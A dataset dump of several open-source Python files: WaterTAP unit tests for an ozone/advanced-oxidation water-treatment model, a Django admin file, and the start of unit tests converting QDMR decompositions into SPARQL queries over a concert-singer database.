] | null | null | null | watertap/unit_models/zero_order/tests/test_ozone_aop_zo.py | kurbansitterley/watertap | 1a8986a779bdcb36f1481f03eed24c6c42d26481 | [
"BSD-3-Clause-LBNL"
] | null | null | null | ###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Tests for zero-order Ozone/AOP model
"""
import pytest
from pyomo.environ import (
check_optimal_termination,
ConcreteModel,
Constraint,
value,
Var,
Block,
)
from pyomo.util.check_units import assert_units_consistent
from idaes.core import FlowsheetBlock
from idaes.core.util.exceptions import ConfigurationError
from idaes.core.solvers import get_solver
from idaes.core.util.model_statistics import degrees_of_freedom
from idaes.core.util.testing import initialization_tester
from idaes.core import UnitModelCostingBlock
from watertap.unit_models.zero_order import OzoneAOPZO
from watertap.core.wt_database import Database
from watertap.core.zero_order_properties import WaterParameterBlock
from watertap.core.zero_order_costing import ZeroOrderCosting
solver = get_solver()
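# The test class below follows the standard zero-order unit test sequence:
# build the flowsheet, load parameters from the database, check degrees of
# freedom and unit consistency, initialize, solve, and verify the solution.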
class TestOzoneAOPZO_with_default_removal:
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel()
m.db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = WaterParameterBlock(
default={
"solute_list": [
"cryptosporidium",
"toc",
"giardia_lamblia",
"eeq",
"total_coliforms_fecal_ecoli",
"viruses_enteric",
"tss",
]
}
)
m.fs.unit = OzoneAOPZO(
default={"property_package": m.fs.params, "database": m.db}
)
m.fs.unit.inlet.flow_mass_comp[0, "H2O"].fix(100)
m.fs.unit.inlet.flow_mass_comp[0, "cryptosporidium"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "toc"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "giardia_lamblia"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "eeq"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "total_coliforms_fecal_ecoli"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "viruses_enteric"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "tss"].fix(1)
return m
@pytest.mark.unit
def test_toc_in_solute_list(self):
model = ConcreteModel()
model.db = Database()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.params = WaterParameterBlock(
default={"solute_list": ["cryptosporidium", "giardia_lamblia", "eeq"]}
)
with pytest.raises(
ConfigurationError,
match="TOC must be in solute list for Ozonation or Ozone/AOP",
):
model.fs.unit = OzoneAOPZO(
default={"property_package": model.fs.params, "database": model.db}
)
@pytest.mark.unit
def test_build(self, model):
assert model.fs.unit.config.database is model.db
assert model.fs.unit._tech_type == "ozone_aop"
assert isinstance(model.fs.unit.contact_time, Var)
assert isinstance(model.fs.unit.concentration_time, Var)
assert isinstance(model.fs.unit.mass_transfer_efficiency, Var)
assert isinstance(model.fs.unit.ozone_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_consumption, Var)
assert isinstance(model.fs.unit.electricity, Var)
assert isinstance(model.fs.unit.specific_energy_coeff, Var)
assert isinstance(model.fs.unit.oxidant_dose, Var)
assert isinstance(model.fs.unit.chemical_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_toc_ratio, Var)
assert isinstance(model.fs.unit.oxidant_ozone_ratio, Var)
assert isinstance(model.fs.unit.ozone_consumption_constraint, Constraint)
assert isinstance(model.fs.unit.ozone_flow_mass_constraint, Constraint)
assert isinstance(model.fs.unit.electricity_constraint, Constraint)
assert isinstance(model.fs.unit.chemical_flow_mass_constraint, Constraint)
@pytest.mark.component
def test_load_parameters(self, model):
data = model.db.get_unit_operation_parameters("ozone_aop")
model.fs.unit.load_parameters_from_database(use_default_removal=True)
assert model.fs.unit.recovery_frac_mass_H2O[0].fixed
assert model.fs.unit.recovery_frac_mass_H2O[0].value == 1
for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():
assert v.fixed
if j not in data["removal_frac_mass_solute"]:
assert v.value == data["default_removal_frac_mass_solute"]["value"]
else:
assert v.value == data["removal_frac_mass_solute"][j]["value"]
assert model.fs.unit.contact_time[0].fixed
assert model.fs.unit.contact_time[0].value == data["contact_time"]["value"]
assert model.fs.unit.concentration_time[0].fixed
assert (
model.fs.unit.concentration_time[0].value
== data["concentration_time"]["value"]
)
assert model.fs.unit.mass_transfer_efficiency[0].fixed
assert (
model.fs.unit.mass_transfer_efficiency[0].value
== data["mass_transfer_efficiency"]["value"]
)
assert model.fs.unit.specific_energy_coeff[0].fixed
assert (
model.fs.unit.specific_energy_coeff[0].value
== data["specific_energy_coeff"]["value"]
)
assert (
model.fs.unit.oxidant_ozone_ratio[0].value
== data["oxidant_ozone_ratio"]["value"]
)
@pytest.mark.component
def test_degrees_of_freedom(self, model):
assert degrees_of_freedom(model.fs.unit) == 0
@pytest.mark.component
def test_unit_consistency(self, model):
assert_units_consistent(model.fs.unit)
@pytest.mark.component
def test_initialize(self, model):
initialization_tester(model)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solve(self, model):
results = solver.solve(model)
# Check for optimal solution
assert check_optimal_termination(results)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solution(self, model):
assert pytest.approx(0.102089, rel=1e-5) == value(
model.fs.unit.properties_treated[0].flow_vol
)
assert pytest.approx(2.661333, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["toc"]
)
assert pytest.approx(9.795299, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["tss"]
)
assert pytest.approx(0.103497, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["eeq"]
)
assert pytest.approx(9921.863324, rel=1e-5) == value(
model.fs.unit.ozone_flow_mass[0]
)
assert pytest.approx(49609.316620, rel=1e-5) == value(
model.fs.unit.electricity[0]
)
assert pytest.approx(0.50005, rel=1e-5) == value(
model.fs.unit.chemical_flow_mass[0]
)
@pytest.mark.component
def test_report(self, model):
model.fs.unit.report()
class TestOzoneAOPZO_w_o_default_removal:
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel()
m.db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = WaterParameterBlock(
default={
"solute_list": [
"cryptosporidium",
"toc",
"giardia_lamblia",
"eeq",
"total_coliforms_fecal_ecoli",
"viruses_enteric",
]
}
)
m.fs.unit = OzoneAOPZO(
default={"property_package": m.fs.params, "database": m.db}
)
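# Feed mirrors the first fixture but omits "tss", so no solute needs a default removal value.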
m.fs.unit.inlet.flow_mass_comp[0, "H2O"].fix(100)
m.fs.unit.inlet.flow_mass_comp[0, "cryptosporidium"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "toc"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "giardia_lamblia"].fix(2)
m.fs.unit.inlet.flow_mass_comp[0, "eeq"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "total_coliforms_fecal_ecoli"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "viruses_enteric"].fix(1)
return m
@pytest.mark.unit
def test_toc_in_solute_list(self):
model = ConcreteModel()
model.db = Database()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.params = WaterParameterBlock(
default={"solute_list": ["cryptosporidium", "viruses_enteric"]}
)
with pytest.raises(
ConfigurationError,
match="TOC must be in solute list for Ozonation or Ozone/AOP",
):
model.fs.unit = OzoneAOPZO(
default={"property_package": model.fs.params, "database": model.db}
)
@pytest.mark.unit
def test_build(self, model):
assert model.fs.unit.config.database is model.db
assert model.fs.unit._tech_type == "ozone_aop"
assert isinstance(model.fs.unit.contact_time, Var)
assert isinstance(model.fs.unit.concentration_time, Var)
assert isinstance(model.fs.unit.mass_transfer_efficiency, Var)
assert isinstance(model.fs.unit.ozone_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_consumption, Var)
assert isinstance(model.fs.unit.electricity, Var)
assert isinstance(model.fs.unit.specific_energy_coeff, Var)
assert isinstance(model.fs.unit.oxidant_dose, Var)
assert isinstance(model.fs.unit.chemical_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_toc_ratio, Var)
assert isinstance(model.fs.unit.oxidant_ozone_ratio, Var)
assert isinstance(model.fs.unit.ozone_consumption_constraint, Constraint)
assert isinstance(model.fs.unit.ozone_flow_mass_constraint, Constraint)
assert isinstance(model.fs.unit.electricity_constraint, Constraint)
assert isinstance(model.fs.unit.chemical_flow_mass_constraint, Constraint)
@pytest.mark.component
def test_load_parameters(self, model):
data = model.db.get_unit_operation_parameters("ozone_aop")
model.fs.unit.load_parameters_from_database()
assert model.fs.unit.recovery_frac_mass_H2O[0].fixed
assert model.fs.unit.recovery_frac_mass_H2O[0].value == 1
for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():
assert v.fixed
if j not in data["removal_frac_mass_solute"]:
assert v.value == data["default_removal_frac_mass_solute"]["value"]
else:
assert v.value == data["removal_frac_mass_solute"][j]["value"]
assert model.fs.unit.contact_time[0].fixed
assert model.fs.unit.contact_time[0].value == data["contact_time"]["value"]
assert model.fs.unit.concentration_time[0].fixed
assert (
model.fs.unit.concentration_time[0].value
== data["concentration_time"]["value"]
)
assert model.fs.unit.mass_transfer_efficiency[0].fixed
assert (
model.fs.unit.mass_transfer_efficiency[0].value
== data["mass_transfer_efficiency"]["value"]
)
assert model.fs.unit.specific_energy_coeff[0].fixed
assert (
model.fs.unit.specific_energy_coeff[0].value
== data["specific_energy_coeff"]["value"]
)
assert (
model.fs.unit.oxidant_ozone_ratio[0].value
== data["oxidant_ozone_ratio"]["value"]
)
@pytest.mark.component
def test_degrees_of_freedom(self, model):
assert degrees_of_freedom(model.fs.unit) == 0
@pytest.mark.component
def test_unit_consistency(self, model):
assert_units_consistent(model.fs.unit)
@pytest.mark.component
def test_initialize(self, model):
initialization_tester(model)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solve(self, model):
results = solver.solve(model)
# Check for optimal solution
assert check_optimal_termination(results)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solution(self, model):
assert pytest.approx(0.101186, rel=1e-5) == value(
model.fs.unit.properties_treated[0].flow_vol
)
assert pytest.approx(2.685090, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["toc"]
)
assert pytest.approx(1.912526, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["giardia_lamblia"]
)
assert pytest.approx(0.104420, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["eeq"]
)
assert pytest.approx(9921.863324, rel=1e-5) == value(
model.fs.unit.ozone_flow_mass[0]
)
assert pytest.approx(49609.316620, rel=1e-5) == value(
model.fs.unit.electricity[0]
)
assert pytest.approx(0.50005, rel=1e-5) == value(
model.fs.unit.chemical_flow_mass[0]
)
@pytest.mark.component
def test_report(self, model):
model.fs.unit.report()
def test_costing():
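"""Attach ZeroOrderCosting to an Ozone/AOP unit and check the created costing vars, constraints and registered flows.
"""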
m = ConcreteModel()
m.db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = WaterParameterBlock(
default={"solute_list": ["viruses_enteric", "toc", "cryptosporidium"]}
)
m.fs.costing = ZeroOrderCosting()
m.fs.unit1 = OzoneAOPZO(default={"property_package": m.fs.params, "database": m.db})
m.fs.unit1.inlet.flow_mass_comp[0, "H2O"].fix(10000)
m.fs.unit1.inlet.flow_mass_comp[0, "viruses_enteric"].fix(1)
m.fs.unit1.inlet.flow_mass_comp[0, "toc"].fix(2)
m.fs.unit1.inlet.flow_mass_comp[0, "cryptosporidium"].fix(3)
m.fs.unit1.load_parameters_from_database(use_default_removal=True)
assert degrees_of_freedom(m.fs.unit1) == 0
m.fs.unit1.costing = UnitModelCostingBlock(
default={"flowsheet_costing_block": m.fs.costing}
)
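# Costing should build the shared ozone_aop parameter block and cost this unit.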
assert isinstance(m.fs.unit1.chemical_flow_mass, Var)
assert isinstance(m.fs.costing.ozone_aop, Block)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_a_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_b_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_c_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_d_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.aop_capital_a_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.aop_capital_b_parameter, Var)
assert isinstance(m.fs.unit1.costing.capital_cost, Var)
assert isinstance(m.fs.unit1.costing.capital_cost_constraint, Constraint)
assert_units_consistent(m.fs)
assert degrees_of_freedom(m.fs.unit1) == 0
assert m.fs.unit1.electricity[0] in m.fs.costing._registered_flows["electricity"]
assert str(m.fs.costing._registered_flows["hydrogen_peroxide"][0]) == str(
m.fs.unit1.chemical_flow_mass[0]
)
| 38.987805 | 88 | 0.649296 | 2,021 | 15,985 | 4.948046 | 0.115289 | 0.0594 | 0.0902 | 0.069 | 0.847 | 0.834 | 0.8292 | 0.8262 | 0.8078 | 0.7875 | 0 | 0.020535 | 0.226212 | 15,985 | 409 | 89 | 39.08313 | 0.787938 | 0.038911 | 0 | 0.691617 | 0 | 0 | 0.091993 | 0.025089 | 0 | 0 | 0 | 0 | 0.293413 | 1 | 0.062874 | false | 0 | 0.038922 | 0 | 0.113772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c1e089c1185d554a6671790699a986d06f5c096 | 108 | py | Python | hollow/iga/__init__.py | otherlab/hollow | 9f8209464969dfd449c791c93978292998d5c4e7 | [
"BSD-2-Clause"
] | 5 | 2016-05-09T17:49:28.000Z | 2021-04-18T22:22:05.000Z | hollow/iga/__init__.py | otherlab/hollow | 9f8209464969dfd449c791c93978292998d5c4e7 | [
"BSD-2-Clause"
] | null | null | null | hollow/iga/__init__.py | otherlab/hollow | 9f8209464969dfd449c791c93978292998d5c4e7 | [
"BSD-2-Clause"
] | 1 | 2020-05-20T06:16:51.000Z | 2020-05-20T06:16:51.000Z | from __future__ import division,print_function,unicode_literals,absolute_import
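# Pull in the native hollow_wrap bindings from the parent package.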
from .. import hollow_wrap
| 27 | 79 | 0.87037 | 14 | 108 | 6.142857 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 108 | 3 | 80 | 36 | 0.868687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
9c749e7b329ef210d565f0087765c0b3b3612086 | 141 | py | Python | graph/admin.py | Unicorn-Dev/ProGraph | 4ec7a2c09b243562d5eb5f7cfeace0887fd162af | [
"MIT"
] | null | null | null | graph/admin.py | Unicorn-Dev/ProGraph | 4ec7a2c09b243562d5eb5f7cfeace0887fd162af | [
"MIT"
] | null | null | null | graph/admin.py | Unicorn-Dev/ProGraph | 4ec7a2c09b243562d5eb5f7cfeace0887fd162af | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Graph
from .models import Image
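# Make both models editable through the Django admin.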
admin.site.register(Graph)
admin.site.register(Image)
| 17.625 | 32 | 0.808511 | 21 | 141 | 5.428571 | 0.47619 | 0.175439 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113475 | 141 | 7 | 33 | 20.142857 | 0.912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13329a9f916f5cefe66cc5ac5d95625515e3a93b | 230,435 | py | Python | qdmr2sparql/test_qdmr2sparql.py | guoyi118/sparqling-queries | 8c9b9f517d6e05ac465a84df79f40484bc852c26 | [
"MIT"
] | 21 | 2021-09-14T11:33:05.000Z | 2022-03-29T13:22:19.000Z | qdmr2sparql/test_qdmr2sparql.py | guoyi118/sparqling-queries | 8c9b9f517d6e05ac465a84df79f40484bc852c26 | [
"MIT"
] | 1 | 2022-02-14T21:13:15.000Z | 2022-02-18T20:23:36.000Z | qdmr2sparql/test_qdmr2sparql.py | guoyi118/sparqling-queries | 8c9b9f517d6e05ac465a84df79f40484bc852c26 | [
"MIT"
] | 5 | 2021-09-20T08:54:55.000Z | 2022-02-10T00:59:54.000Z | import os
import ast
import unittest
import time
import attr
from timeout_decorator import timeout
import textwrap
from functools import lru_cache
from qdmr2sparql.datasets import QdmrInstance, DatasetBreak, DatasetSpider
from qdmr2sparql.structures import GroundingIndex, GroundingKey, RdfGraph
from qdmr2sparql.structures import QueryResult, QueryToRdf, OutputColumnId
from qdmr2sparql.query_generator import create_sparql_query_from_qdmr
ONE_TEST_TIMEOUT = 120
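# SPARQL endpoint used by QueryResult.execute_query_to_rdf; None is assumed to
# fall back to local in-process evaluation. A manual override might look like
# (hypothetical URL):
# VIRTUOSO_SPARQL_SERVICE = "http://localhost:8890/sparql"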
VIRTUOSO_SPARQL_SERVICE = None
class TestSelect(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_table(self):
"""When selecting full table we return the set or primary keys
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer
WHERE
{
?singer arc:singer:Singer_ID ?singer.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("singer"), schema)])
qdmr = QdmrInstance(["select"], [["singers"]])
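# GroundingIndex(op_index, arg_index, phrase) ties a QDMR argument phrase to
# its schema grounding (here: the whole "singer" table).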
grounding = {GroundingIndex(0,0,"singers") : GroundingKey.make_table_grounding("singer")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column(self):
"""When selecting the column we return the items of that column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select"], [["name"]])
grounding = {GroundingIndex(0,0,"name") : GroundingKey.make_column_grounding("singer", "Name")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_value(self):
"""When selecting the value we return all etries of that value in that column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_value_grounding("singer", "Country", "France"))])
qdmr = QdmrInstance(["select"], [["France"]])
grounding = {GroundingIndex(0,0,"France") : GroundingKey.make_value_grounding("singer", "Country", "France")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSelectProject(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_table_project_column(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select", "project"], [["singers"], ["countries", "#1"]])
grounding = { GroundingIndex(0,0,"singers") : GroundingKey.make_table_grounding("singer"),
GroundingIndex(1,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_table(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("singer"), schema)])
qdmr = QdmrInstance(["select", "project"], [["countries"], ["singers", "#1"]])
grounding = { GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country"),
GroundingIndex(1,0,"singers") : GroundingKey.make_table_grounding("singer")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_value(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?countries
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_value_grounding("singer", "Country", "France"))])
qdmr = QdmrInstance(["select", "project"], [["names"], ["France", "#1"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,0,"France") : GroundingKey.make_value_grounding("singer", "Country", "France"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_value_project_column(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project"], [["France"], ["names", "#1"]])
grounding = { GroundingIndex(0,0,"France") : GroundingKey.make_value_grounding("singer", "Country", "France"),
GroundingIndex(1,0,"names") : GroundingKey.make_column_grounding("singer", "Name")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestDifferentColumnOrder(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_column_order(self):
"""
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?countries
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))
])
qdmr = QdmrInstance(["select", "project", "union"], [["names"], ["Country", "#1"], ["#2", "#1"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,0,"Country") : GroundingKey.make_column_grounding("singer", "Country"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=False,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSelectFilter(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_filter_value(self):
"""Select table, filter values based on a value in another column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter"], [["names"], ["#1", "France"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,1,"France") : GroundingKey.make_value_grounding("singer", "Country", "France")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_filter_with_comparative(self):
"""Select table, filter values based on a value in another column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Age ?Age.
FILTER(?Age > 32).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter"], [["names"], ["#1", "older than 32"]])
grounding = {GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
